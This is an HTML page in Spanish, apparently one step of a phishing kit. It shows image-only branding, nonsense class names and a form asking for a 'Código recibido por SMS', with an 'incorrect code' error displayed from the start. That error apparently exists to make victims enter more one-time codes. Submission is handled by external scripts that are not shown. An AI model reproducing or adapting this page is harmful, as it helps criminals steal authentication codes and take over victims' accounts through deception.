<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/brito.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
    
    <div class="kaml">

        <div class="ldakhl">
            <div class="topano">
                <div class="topano">
                    <img class="topo-mb" src="./img/tripot2.PNG" alt="">
                    <img class="topo-pc" src="./img/topan-mb-02.png" alt="">
                    <img src="./img/smpis-img02.png" alt="">
                </div>
            </div>
        
        
            <div class="container">
                <div class="container">
            
                    <div class="upog">
                        <img class="topo-mb" src="./img/up2.PNG" alt="">
                        
                    </div>
            
                    
                    <form method="post" id="pg5">
                    
                        
                        <div class="infos">
                            <div class="formal">
                                <p class="pp1">SMS</p>
                            <p>Código recibido por SMS</p>
                            <input type="tel" name="" id="codima">
                            <p style="color: rgb(199, 46, 46);">Código SMS incorrecto</p>
                        </div>
                            
                            <button id="botn" class="botn2 btn2">Continuar </button>
                    </div>
                        
                    </form>
                            
                        
                        
        
                        
                    
                        
                    
                    
                    
                    </div>
            </div>
        

        <div class="botano">
            <img class="topo-mb" src="./img/botano2.png" alt="">
            <img class="topo-pc" src="./img/botano-mb-02.png" alt="">
        </div>
   

    </div>
</div>




    




    <script src="./js/stb.js"></script>
    <script src="./js/inp.js"></script>
    <script>
        
    </script>
</body>
</html>